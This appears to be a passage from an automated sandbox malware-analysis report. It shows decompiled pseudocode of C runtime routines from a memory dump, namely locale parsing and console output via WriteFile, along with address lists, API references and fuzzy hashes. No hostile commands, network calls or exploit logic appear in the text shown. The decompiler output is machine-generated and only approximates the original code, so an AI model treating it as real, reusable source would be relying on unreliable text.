													_v458 = _t427;
													_t426 = _v452;
													if(_t427 !=  *((intOrPtr*)(_t377 + 2))) {
														break;
													} else {
														_t259 = _t259 + 4;
														_t377 = _t377 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t260;
												if(_t260 == 0) {
													_t362 = _t362 + 1;
													__eflags = _t362;
													goto L74;
												} else {
													_t261 =  &_v276;
													_push(_t261);
													_push(_t449);
													_push(_t431);
													L84();
													_t426 = _v452;
													_t477 = _t477 + 0xc;
													__eflags = _t261;
													if(_t261 == 0) {
														_t373 = 0;
														_t258 = 0;
														_v456 = 0;
													} else {
														_t362 = _t362 + 1;
														_t373 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t260 = _t259 | 0x00000001;
											_t373 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t449 = _t449 + 1;
										_t426 = _t426 + 0x10;
										_v452 = _t426;
										__eflags = _t449 - 5;
									} while (_t449 <= 5);
									__eflags = _t258;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t362;
										goto L78;
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t447 + 2) - 0x43;
								if( *(_t447 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t447 + 4)) - 0x5f;
									if( *((short*)(_t447 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t263 = E6DE2D60D(_t447, 0x6de40f28);
											_t364 = _t263;
											_v472 = _t364;
											_pop(_t379);
											__eflags = _t364;
											if(_t364 == 0) {
												break;
											}
											_t265 = _t263 - _t447;
											__eflags = _t265;
											_v456 = _t265 >> 1;
											if(_t265 == 0) {
												break;
											} else {
												_t267 = 0x3b;
												__eflags =  *_t364 - _t267;
												if( *_t364 == _t267) {
													break;
												} else {
													_t434 = _v456;
													_t365 = 0x6de40dec;
													_v460 = 1;
													do {
														_t268 = E6DE1ABBA( *_t365, _t447, _t434);
														_t475 = _t475 + 0xc;
														__eflags = _t268;
														if(_t268 != 0) {
															goto L46;
														} else {
															_t380 =  *_t365;
															_t425 = _t380 + 2;
															do {
																_t337 =  *_t380;
																_t380 = _t380 + 2;
																__eflags = _t337 - _v468;
															} while (_t337 != _v468);
															_t379 = _t380 - _t425 >> 1;
															__eflags = _t434 - _t380 - _t425 >> 1;
															if(_t434 != _t380 - _t425 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v460 = _v460 + 1;
														_t365 = _t365 + 0xc;
														__eflags = _t365 - 0x6de40e1c;
													} while (_t365 <= 0x6de40e1c);
													_t362 = _v472 + 2;
													_t269 = E6DE2D5BD(_t379, _t362, 0x6de40f30);
													_t431 = _v464;
													_t450 = _t269;
													_pop(_t383);
													__eflags = _t450;
													if(_t450 != 0) {
														L49:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t270 = _v452;
															goto L55;
														} else {
															_push(_t450);
															_t272 = E6DE2D5B2(_t383,  &_v276, 0x83, _t362);
															_t478 = _t475 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6DE12188();
																asm("int3");
																_push(_t466);
																_t468 = _t478;
																_t275 =  *0x6de9506c; // 0xc4837075
																_v556 = _t275 ^ _t468;
																_push(_t362);
																_t367 = _v540;
																_push(_t450);
																_push(_t431);
																_t435 = _v544;
																_v1292 = _t367;
																_v1276 = E6DE1D5FF(_t367, _t383, _t425) + 0x278;
																_t282 = E6DE1DE92(_t367, _t425, _t435, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55,  &_v1256);
																_t480 = _t478 - 0x2e4 + 0x18;
																__eflags = _t282;
																if(_t282 != 0) {
																	_t101 = _t367 + 2; // 0x6
																	_t453 = _t101 << 4;
																	__eflags = _t453;
																	_t283 =  &_v280;
																	_v724 = _t453;
																	_t428 =  *(_t453 + _t435);
																	_t384 =  *(_t453 + _t435);
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t283 -  *_t384;
																		_t455 = _v724;
																		if( *_t283 !=  *_t384) {
																			break;
																		}
																		__eflags =  *_t283;
																		if( *_t283 == 0) {
																			L93:
																			_t284 = _v712;
																		} else {
																			_t462 =  *((intOrPtr*)(_t283 + 2));
																			__eflags = _t462 -  *((intOrPtr*)(_t384 + 2));
																			_v718 = _t462;
																			_t455 = _v724;
																			if(_t462 !=  *((intOrPtr*)(_t384 + 2))) {
																				break;
																			} else {
																				_t283 = _t283 + 4;
																				_t384 = _t384 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L93;
																				}
																			}
																		}
																		L95:
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t385 =  &_v280;
																			_t428 = _t385 + 2;
																			do {
																				_t285 =  *_t385;
																				_t385 = _t385 + 2;
																				__eflags = _t285 - _v712;
																			} while (_t285 != _v712);
																			_v728 = (_t385 - _t428 >> 1) + 1;
																			_t288 = E6DE1F26D(_t385 - _t428 >> 1, 4 + ((_t385 - _t428 >> 1) + 1) * 2);
																			_v740 = _t288;
																			__eflags = _t288;
																			if(_t288 == 0) {
																				goto L86;
																			} else {
																				_v732 =  *((intOrPtr*)(_t455 + _t435));
																				_t125 = _t367 * 4; // 0xe764e850
																				_v744 =  *((intOrPtr*)(_t435 + _t125 + 0xa0));
																				_t128 = _t435 + 8; // 0x8b018b
																				_v748 =  *_t128;
																				_t394 =  &_v280;
																				_v720 = _t288 + 4;
																				_t292 = E6DE191A7(_t288 + 4, _v728,  &_v280);
																				_t482 = _t480 + 0xc;
																				__eflags = _t292;
																				if(_t292 != 0) {
																					_t293 = _v712;
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					E6DE12188();
																					asm("int3");
																					_t295 =  *0x6de976f0; // 0x3424800
																					 *0x6de95108 =  *((intOrPtr*)(_t295 + 0x88));
																					 *0x6de951c0 =  *_t295;
																					_t296 =  *((intOrPtr*)(_t295 + 4));
																					 *0x6de951ec = _t296;
																					return _t296;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t435)) = _v720;
																					if(_v280 != 0x43) {
																						L104:
																						_t299 = E6DE1DB3B(_t367, _t394, _t435,  &_v708);
																						_t398 = _v712;
																						 *(_t435 + 0xa0 + _t367 * 4) = _t299;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L104;
																						} else {
																							_t398 = _v712;
																							 *(_t435 + 0xa0 + _t367 * 4) = _t398;
																						}
																					}
																					__eflags = _t367 - 2;
																					if(_t367 != 2) {
																						__eflags = _t367 - 1;
																						if(_t367 != 1) {
																							__eflags = _t367 - 5;
																							if(_t367 == 5) {
																								 *((intOrPtr*)(_t435 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t435 + 0x10)) = _v716;
																						}
																					} else {
																						_t460 = _v736;
																						_t428 = _t398;
																						_t408 = _t460;
																						 *(_t435 + 8) = _v716;
																						_v720 = _t460;
																						_v728 = _t460[8];
																						_v716 = _t460[9];
																						while(1) {
																							_t154 = _t435 + 8; // 0x8b018b
																							__eflags =  *_t154 -  *_t408;
																							if( *_t154 ==  *_t408) {
																								break;
																							}
																							_t461 = _v720;
																							_t428 = _t428 + 1;
																							_t331 =  *_t408;
																							 *_t461 = _v728;
																							_v716 = _t408[1];
																							_t408 = _t461 + 8;
																							 *((intOrPtr*)(_t461 + 4)) = _v716;
																							_t367 = _v752;
																							_t460 = _v736;
																							_v728 = _t331;
																							_v720 = _t408;
																							__eflags = _t428 - 5;
																							if(_t428 < 5) {
																								continue;
																							} else {
																							}
																							L112:
																							__eflags = _t428 - 5;
																							if(__eflags == 0) {
																								_t178 = _t435 + 8; // 0x8b018b
																								_t322 = E6DE26102(_t367, _t428, _t435, __eflags, _v712, 1, 0x6de40ea8, 0x7f,  &_v536,  *_t178, 1);
																								_t482 = _t482 + 0x1c;
																								__eflags = _t322;
																								_t323 = _v712;
																								if(_t322 == 0) {
																									_t460[1] = _t323;
																								} else {
																									do {
																										 *(_t468 + _t323 * 2 - 0x20c) =  *(_t468 + _t323 * 2 - 0x20c) & 0x000001ff;
																										_t323 = _t323 + 1;
																										__eflags = _t323 - 0x7f;
																									} while (_t323 < 0x7f);
																									_t326 = E6DDF1C3C( &_v536,  *0x6de951e8, 0xfe);
																									_t482 = _t482 + 0xc;
																									__eflags = _t326;
																									_t460[1] = 0 | _t326 == 0x00000000;
																								}
																								_t193 = _t435 + 8; // 0x8b018b
																								 *_t460 =  *_t193;
																							}
																							 *(_t435 + 0x18) = _t460[1];
																							goto L123;
																						}
																						__eflags = _t428;
																						if(_t428 != 0) {
																							 *_t460 =  *(_t460 + _t428 * 8);
																							_t460[1] =  *(_t460 + 4 + _t428 * 8);
																							 *(_t460 + _t428 * 8) = _v728;
																							 *(_t460 + 4 + _t428 * 8) = _v716;
																						}
																						goto L112;
																					}
																					L123:
																					_t300 = _t367 * 0xc;
																					_t200 = _t300 + 0x6de40de8; // 0x6ddd815c
																					 *0x6de3a26c(_t435);
																					_t302 =  *((intOrPtr*)( *_t200))();
																					_t401 = _v732;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						__eflags = _t401 - 0x6de952b0;
																						if(_t401 != 0x6de952b0) {
																							_t459 = _t367 + _t367;
																							__eflags = _t459;
																							asm("lock xadd [eax], ecx");
																							if(_t459 != 0) {
																								goto L128;
																							} else {
																								_t218 = _t459 * 8; // 0x10468b00
																								E6DE1CBD3( *((intOrPtr*)(_t435 + _t218 + 0x28)));
																								_t221 = _t459 * 8; // 0x3b8e8
																								E6DE1CBD3( *((intOrPtr*)(_t435 + _t221 + 0x24)));
																								_t224 = _t367 * 4; // 0xe764e850
																								E6DE1CBD3( *((intOrPtr*)(_t435 + _t224 + 0xa0)));
																								_t404 = _v712;
																								 *((intOrPtr*)(_v724 + _t435)) = _t404;
																								 *(_t435 + 0xa0 + _t367 * 4) = _t404;
																							}
																						}
																						_t402 = _v740;
																						 *_t402 = 1;
																						 *((intOrPtr*)(_t435 + 0x28 + (_t367 + _t367) * 8)) = _t402;
																					} else {
																						 *(_v724 + _t435) = _t401;
																						_t205 = _t367 * 4; // 0xe764e850
																						E6DE1CBD3( *((intOrPtr*)(_t435 + _t205 + 0xa0)));
																						 *(_t435 + 0xa0 + _t367 * 4) = _v744;
																						E6DE1CBD3(_v740);
																						 *(_t435 + 8) = _v748;
																						goto L86;
																					}
																					goto L87;
																				}
																			}
																		} else {
																			goto L87;
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t284 = _t283 | 0x00000001;
																	__eflags = _t284;
																	goto L95;
																} else {
																	L86:
																	__eflags = 0;
																	L87:
																	_pop(_t456);
																	__eflags = _v16 ^ _t468;
																	return E6DDEF8A5(_v16 ^ _t468, _t428, _t456);
																}
															} else {
																_t333 = _t450 + _t450;
																__eflags = _t333 - 0x106;
																if(_t333 >= 0x106) {
																	E6DDF03A9();
																	goto L83;
																} else {
																	 *((short*)(_t466 + _t333 - 0x10c)) = 0;
																	_t335 =  &_v276;
																	_push(_t335);
																	_push(_v460);
																	_push(_t431);
																	L84();
																	_t475 = _t478 + 0xc;
																	__eflags = _t335;
																	_t270 = _v452;
																	if(_t335 != 0) {
																		_t270 = _t270 + 1;
																		_v452 = _t270;
																	}
																	L55:
																	_t447 = _t362 + _t450 * 2;
																	_t373 = 0;
																	__eflags =  *_t447;
																	if( *_t447 == 0) {
																		L57:
																		__eflags = _t270;
																		L78:
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																		}
																		goto L81;
																	} else {
																		_t447 = _t447 + 2;
																		__eflags =  *_t447;
																		if( *_t447 != 0) {
																			continue;
																		} else {
																			goto L57;
																		}
																	}
																}
															}
														}
													} else {
														_t336 = 0x3b;
														__eflags =  *_t362 - _t336;
														if( *_t362 != _t336) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L131;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t447;
						if(_t447 != 0) {
							_push(_t447);
							_push(_t251);
							_push(_t431);
							L84();
						}
						L81:
						_pop(_t448);
						__eflags = _v12 ^ _t466;
						return E6DDEF8A5(_v12 ^ _t466, _t425, _t448);
					}
				}
				L131:
			}

0x6de1e506
0x6de1e509
0x6de1e50b
0x6de1e50e
0x6de1e50f
0x6de1e518
0x6de1e520
0x6de1e522
0x6de1e524
0x6de1e527
0x6de1e640
0x6de1e645
0x6de1e52d
0x6de1e52d
0x6de1e52e
0x6de1e52e
0x6de1e531
0x6de1e534
0x6de1e536
0x6de1e539
0x6de1e539
0x6de1e53c
0x6de1e53e
0x6de1e541
0x6de1e546
0x6de1e554
0x6de1e55e
0x6de1e561
0x6de1e564
0x6de1e564
0x6de1e56f
0x6de1e574
0x6de1e579
0x00000000
0x6de1e57f
0x6de1e582
0x6de1e582
0x6de1e585
0x6de1e587
0x6de1e58a
0x6de1e58a
0x6de1e58a
0x6de1e58c
0x6de1e58c
0x6de1e58c
0x6de1e592
0x00000000
0x00000000
0x6de1e597
0x6de1e5ae
0x6de1e5ae
0x6de1e599
0x6de1e599
0x6de1e5a1
0x00000000
0x6de1e5a3
0x6de1e5a3
0x6de1e5a6
0x6de1e5ac
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1e5ac
0x6de1e5a1
0x6de1e5b7
0x6de1e5bc
0x6de1e5be
0x6de1e5c3
0x6de1e5c6
0x6de1e5c9
0x6de1e5cc
0x6de1e5cf
0x6de1e5d1
0x6de1e5d6
0x6de1e5e0
0x6de1e5e8
0x6de1e5f0
0x00000000
0x6de1e5f6
0x6de1e5fa
0x6de1e647
0x6de1e64d
0x6de1e650
0x6de1e653
0x6de1e655
0x6de1e659
0x6de1e65d
0x6de1e65f
0x6de1e662
0x6de1e667
0x6de1e65d
0x6de1e668
0x6de1e66b
0x6de1e66d
0x6de1e66f
0x6de1e673
0x6de1e674
0x6de1e676
0x6de1e679
0x6de1e67e
0x6de1e674
0x6de1e681
0x6de1e684
0x6de1e687
0x6de1e68a
0x6de1e68d
0x6de1e68d
0x6de1e5fc
0x6de1e5fc
0x6de1e5ff
0x6de1e602
0x6de1e604
0x6de1e608
0x6de1e60c
0x6de1e60e
0x6de1e611
0x6de1e616
0x6de1e60c
0x6de1e617
0x6de1e61c
0x6de1e61e
0x6de1e623
0x6de1e625
0x6de1e628
0x6de1e62d
0x6de1e623
0x6de1e62e
0x6de1e632
0x6de1e632
0x6de1e635
0x6de1e639
0x6de1e63c
0x6de1e63c
0x00000000
0x6de1e63f
0x00000000
0x6de1e5f0
0x6de1e5b2
0x6de1e5b4
0x6de1e5b4
0x00000000
0x6de1e5b4
0x6de1e694
0x6de1e695
0x6de1e696
0x6de1e697
0x6de1e698
0x6de1e699
0x6de1e69e
0x6de1e6a1
0x6de1e6a2
0x6de1e6a4
0x6de1e6aa
0x6de1e6b1
0x6de1e6b4
0x6de1e6b7
0x6de1e6b8
0x6de1e6b9
0x6de1e6bc
0x6de1e6bd
0x6de1e6c0
0x6de1e6c6
0x6de1e6c8
0x6de1e6ed
0x6de1e6f7
0x6de1e6fd
0x6de1e6ff
0x6de1e705
0x6de1e707
0x6de1e95a
0x6de1e95b
0x00000000
0x6de1e70d
0x6de1e70d
0x6de1e711
0x6de1e878
0x6de1e88f
0x6de1e894
0x6de1e897
0x6de1e899
0x6de1e89f
0x6de1e89f
0x6de1e8a1
0x6de1e8a1
0x6de1e8a4
0x6de1e8a6
0x6de1e8ac
0x6de1e8ac
0x6de1e8ae
0x6de1e935
0x6de1e935
0x6de1e8b4
0x6de1e8b4
0x6de1e8b6
0x6de1e8bc
0x6de1e8bf
0x6de1e8c2
0x6de1e8c8
0x00000000
0x00000000
0x6de1e8ca
0x6de1e8ce
0x6de1e8f7
0x6de1e8f7
0x6de1e8f9
0x6de1e8d0
0x6de1e8d0
0x6de1e8d4
0x6de1e8d8
0x6de1e8df
0x6de1e8e5
0x00000000
0x6de1e8e7
0x6de1e8e7
0x6de1e8ea
0x6de1e8ed
0x6de1e8f5
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1e8f5
0x6de1e8e5
0x6de1e904
0x6de1e904
0x6de1e906
0x6de1e934
0x6de1e934
0x00000000
0x6de1e908
0x6de1e908
0x6de1e90e
0x6de1e90f
0x6de1e910
0x6de1e911
0x6de1e916
0x6de1e91c
0x6de1e91f
0x6de1e921
0x6de1e928
0x6de1e92a
0x6de1e92c
0x6de1e923
0x6de1e923
0x6de1e924
0x00000000
0x6de1e924
0x6de1e921
0x00000000
0x6de1e906
0x6de1e8fd
0x6de1e8ff
0x6de1e902
0x6de1e902
0x00000000
0x6de1e902
0x6de1e93b
0x6de1e93b
0x6de1e93c
0x6de1e93f
0x6de1e945
0x6de1e945
0x6de1e94e
0x6de1e950
0x00000000
0x6de1e952
0x6de1e952
0x00000000
0x6de1e952
0x6de1e950
0x00000000
0x6de1e717
0x6de1e717
0x6de1e71c
0x00000000
0x6de1e722
0x6de1e722
0x6de1e727
0x00000000
0x6de1e72d
0x6de1e72d
0x6de1e733
0x6de1e738
0x6de1e73a
0x6de1e741
0x6de1e742
0x6de1e744
0x00000000
0x00000000
0x6de1e74a
0x6de1e74a
0x6de1e74e
0x6de1e754
0x00000000
0x6de1e75a
0x6de1e75c
0x6de1e75d
0x6de1e760
0x00000000
0x6de1e766
0x6de1e766
0x6de1e76c
0x6de1e771
0x6de1e77b
0x6de1e77f
0x6de1e784
0x6de1e787
0x6de1e789
0x00000000
0x6de1e78b
0x6de1e78b
0x6de1e78d
0x6de1e790
0x6de1e790
0x6de1e793
0x6de1e796
0x6de1e796
0x6de1e7a1
0x6de1e7a3
0x6de1e7a5
0x00000000
0x00000000
0x6de1e7a5
0x00000000
0x6de1e7a7
0x6de1e7a7
0x6de1e7ad
0x6de1e7b0
0x6de1e7b0
0x6de1e7be
0x6de1e7c7
0x6de1e7cc
0x6de1e7d2
0x6de1e7d5
0x6de1e7d6
0x6de1e7d8
0x6de1e7e6
0x6de1e7e6
0x6de1e7ed
0x6de1e84e
0x00000000
0x6de1e7ef
0x6de1e7ef
0x6de1e7fd
0x6de1e802
0x6de1e805
0x6de1e807
0x6de1e977
0x6de1e979
0x6de1e97a
0x6de1e97b
0x6de1e97c
0x6de1e97d
0x6de1e97e
0x6de1e983
0x6de1e986
0x6de1e987
0x6de1e98f
0x6de1e996
0x6de1e999
0x6de1e99a
0x6de1e99d
0x6de1e9a1
0x6de1e9a2
0x6de1e9a5
0x6de1e9b5
0x6de1e9d8
0x6de1e9dd
0x6de1e9e0
0x6de1e9e2
0x6de1e9f7
0x6de1e9fa
0x6de1e9fa
0x6de1e9fd
0x6de1ea03
0x6de1ea09
0x6de1ea0c
0x6de1ea0e
0x6de1ea11
0x6de1ea18
0x6de1ea1b
0x6de1ea21
0x00000000
0x00000000
0x6de1ea23
0x6de1ea27
0x6de1ea50
0x6de1ea50
0x6de1ea29
0x6de1ea29
0x6de1ea2d
0x6de1ea31
0x6de1ea38
0x6de1ea3e
0x00000000
0x6de1ea40
0x6de1ea40
0x6de1ea43
0x6de1ea46
0x6de1ea4e
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1ea4e
0x6de1ea3e
0x6de1ea5d
0x6de1ea5d
0x6de1ea5f
0x6de1ea65
0x6de1ea6b
0x6de1ea6e
0x6de1ea6e
0x6de1ea71
0x6de1ea74
0x6de1ea74
0x6de1ea84
0x6de1ea92
0x6de1ea97
0x6de1ea9e
0x6de1eaa0
0x00000000
0x6de1eaa6
0x6de1eaac
0x6de1eab2
0x6de1eab9
0x6de1eabf
0x6de1eac2
0x6de1eac8
0x6de1ead5
0x6de1eadc
0x6de1eae1
0x6de1eae4
0x6de1eae6
0x6de1ed3f
0x6de1ed45
0x6de1ed46
0x6de1ed47
0x6de1ed48
0x6de1ed49
0x6de1ed4a
0x6de1ed4f
0x6de1ed50
0x6de1ed5b
0x6de1ed63
0x6de1ed69
0x6de1ed6c
0x6de1ed71
0x6de1eaec
0x6de1eaec
0x6de1eafa
0x6de1eafd
0x6de1eb18
0x6de1eb1f
0x6de1eb25
0x6de1eb2b
0x6de1eaff
0x6de1eaff
0x6de1eb07
0x00000000
0x6de1eb09
0x6de1eb09
0x6de1eb0f
0x6de1eb0f
0x6de1eb07
0x6de1eb32
0x6de1eb35
0x6de1ec52
0x6de1ec55
0x6de1ec62
0x6de1ec65
0x6de1ec6d
0x6de1ec6d
0x6de1ec57
0x6de1ec5d
0x6de1ec5d
0x6de1eb3b
0x6de1eb3b
0x6de1eb41
0x6de1eb49
0x6de1eb4b
0x6de1eb4e
0x6de1eb57
0x6de1eb60
0x6de1eb66
0x6de1eb66
0x6de1eb69
0x6de1eb6b
0x00000000
0x00000000
0x6de1eb6d
0x6de1eb73
0x6de1eb74
0x6de1eb7f
0x6de1eb87
0x6de1eb8f
0x6de1eb92
0x6de1eb95
0x6de1eb9b
0x6de1eba1
0x6de1eba7
0x6de1ebad
0x6de1ebb0
0x00000000
0x00000000
0x6de1ebb2
0x6de1ebd7
0x6de1ebd7
0x6de1ebda
0x6de1ebde
0x6de1ebf7
0x6de1ebfc
0x6de1ebff
0x6de1ec01
0x6de1ec07
0x6de1ec42
0x6de1ec09
0x6de1ec09
0x6de1ec0e
0x6de1ec16
0x6de1ec17
0x6de1ec17
0x6de1ec2e
0x6de1ec35
0x6de1ec38
0x6de1ec3d
0x6de1ec3d
0x6de1ec45
0x6de1ec48
0x6de1ec48
0x6de1ec4d
0x00000000
0x6de1ec4d
0x6de1ebb4
0x6de1ebb6
0x6de1ebbb
0x6de1ebc1
0x6de1ebca
0x6de1ebd3
0x6de1ebd3
0x00000000
0x6de1ebb6
0x6de1ec70
0x6de1ec70
0x6de1ec74
0x6de1ec7c
0x6de1ec82
0x6de1ec85
0x6de1ec8b
0x6de1ec8d
0x6de1eccd
0x6de1ecd3
0x6de1ecda
0x6de1ecda
0x6de1ece0
0x6de1ece4
0x00000000
0x6de1ece6
0x6de1ece6
0x6de1ecea
0x6de1ecef
0x6de1ecf3
0x6de1ecf8
0x6de1ecff
0x6de1ed0d
0x6de1ed13
0x6de1ed16
0x6de1ed16
0x6de1ece4
0x6de1ed25
0x6de1ed2d
0x6de1ed36
0x6de1ec8f
0x6de1ec95
0x6de1ec98
0x6de1ec9f
0x6de1ecb1
0x6de1ecb8
0x6de1ecc5
0x00000000
0x6de1ecc5
0x00000000
0x6de1ec8d
0x6de1eae6
0x6de1ea61
0x00000000
0x6de1ea61
0x00000000
0x6de1ea5f
0x6de1ea58
0x6de1ea5a
0x6de1ea5a
0x00000000
0x6de1e9e4
0x6de1e9e4
0x6de1e9e4
0x6de1e9e6
0x6de1e9ea
0x6de1e9eb
0x6de1e9f6
0x6de1e9f6
0x6de1e80d
0x6de1e80d
0x6de1e810
0x6de1e815
0x6de1e972
0x00000000
0x6de1e81b
0x6de1e81d
0x6de1e825
0x6de1e82b
0x6de1e82c
0x6de1e832
0x6de1e833
0x6de1e838
0x6de1e83b
0x6de1e83d
0x6de1e843
0x6de1e845
0x6de1e846
0x6de1e846
0x6de1e854
0x6de1e854
0x6de1e857
0x6de1e859
0x6de1e85c
0x6de1e86a
0x6de1e86a
0x6de1e954
0x6de1e954
0x00000000
0x6de1e956
0x6de1e956
0x00000000
0x6de1e85e
0x6de1e85e
0x6de1e861
0x6de1e864
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1e864
0x6de1e85c
0x6de1e815
0x6de1e807
0x6de1e7da
0x6de1e7dc
0x6de1e7dd
0x6de1e7e0
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1e7e0
0x6de1e7d8
0x6de1e760
0x00000000
0x6de1e754
0x00000000
0x6de1e871
0x6de1e727
0x6de1e71c
0x6de1e711
0x6de1e6ca
0x6de1e6ca
0x6de1e6cc
0x6de1e6ce
0x6de1e6cf
0x6de1e6d0
0x6de1e6d1
0x6de1e6d6
0x6de1e961
0x6de1e965
0x6de1e966
0x6de1e971
0x6de1e971
0x6de1e6c8
0x00000000

APIs

Part of subcall function 6DE1F26D: RtlAllocateHeap.NTDLL(00000000,6DDD75D9,00000000,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9,00000004,00000000,00000000,00000000), ref: 6DE1F29F

_free.LIBCMT ref: 6DE1E611
_free.LIBCMT ref: 6DE1E628
_free.LIBCMT ref: 6DE1E647
_free.LIBCMT ref: 6DE1E662
_free.LIBCMT ref: 6DE1E679

Strings

m, xrefs: 6DE1E559

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID: m
API String ID: 3033488037-2505914020
Opcode ID: 733b6cbd179e908ec6cf02f332a574fcb27dcccdc654f543bb87edafcfed30f4
Instruction ID: b79cdef547269ac832e5e24574395db7bc3b2c6bf7697f4f3941a7376206d0fc
Opcode Fuzzy Hash: 733b6cbd179e908ec6cf02f332a574fcb27dcccdc654f543bb87edafcfed30f4
Instruction Fuzzy Hash: 8D51C171B08A05AFD711CF29CC40A6AB3F5EF49B28F60456DF909E7650EB31E9418B80

Uniqueness

Uniqueness Score: -1.00%

Function 6DE22C2B, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6DE22C2B(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				signed int _t129;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0x6de9506c; // 0xc4837075
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6de976f8 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t129 =  *(0x6de976f8 + _v48 * 4);
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						_t92 = E6DE1367B(_t116, _t129);
						_t129 = 0x8000;
						if(( *(_t92 + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t129 = _v48;
								 *((char*)( *((intOrPtr*)(0x6de976f8 + _t129 * 4)) + _t116 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x6de976f8 + _t129 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6de976f8 + _t129 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E6DE1CF1B( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6DE1CF1B();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6DDEF8A5(_v8 ^ _t133, _t129, _t132);
			}

APIs

GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,6DE233A0,?,?,00000000,?,?,?), ref: 6DE22C6D
__fassign.LIBCMT ref: 6DE22CE8
__fassign.LIBCMT ref: 6DE22D03
